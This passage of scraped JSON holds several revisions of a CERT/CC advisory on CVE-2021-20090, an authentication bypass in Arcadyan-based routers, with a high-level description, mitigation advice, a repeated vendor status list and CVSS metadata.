Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Netgear Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zyxel Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-12 11:45 UTC \n**Document Revision: ** | 11 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-12T11:45:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-12T14:49:05", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-12T14:49:05", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-08-12T14:49:05", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-12T14:49:05", "differentElements": ["description", "modified"], "edition": 8}, {"bulletin": {"id": "VU:914124", "hash": "6c2fe3494fbb3062787a826e2f847f35", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nWe have elevated information to D-Link Corporation for investigation.\n\nIf affected and we have scope we will update. \n\nThank you for the notification, William Brown security@dlink.com\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hughes Network Systems Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Netgear Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zyxel Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-08-16 13:57 UTC \n**Document Revision: ** | 12 \n", "published": "2021-07-20T00:00:00", "modified": "2021-08-16T13:57:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.kb.cert.org/vuls/id/914124", "reporter": "CERT", "references": ["https://www.tenable.com/security/research/tra-2021-13", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.buffalo.jp/news/detail/20210427-03.html", "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2021-08-16T14:49:06", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}], "modified": "2021-08-16T14:49:06", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-08-16T14:49:06", "rev": 2}}, "objectVersion": "1.6"}, "lastseen": "2021-08-16T14:49:06", "differentElements": ["description", "modified"], "edition": 9}, {"bulletin": {"id": "VU:914124", "hash": "b7d8e9962591f5689e628f1b8b46637e", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information \n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 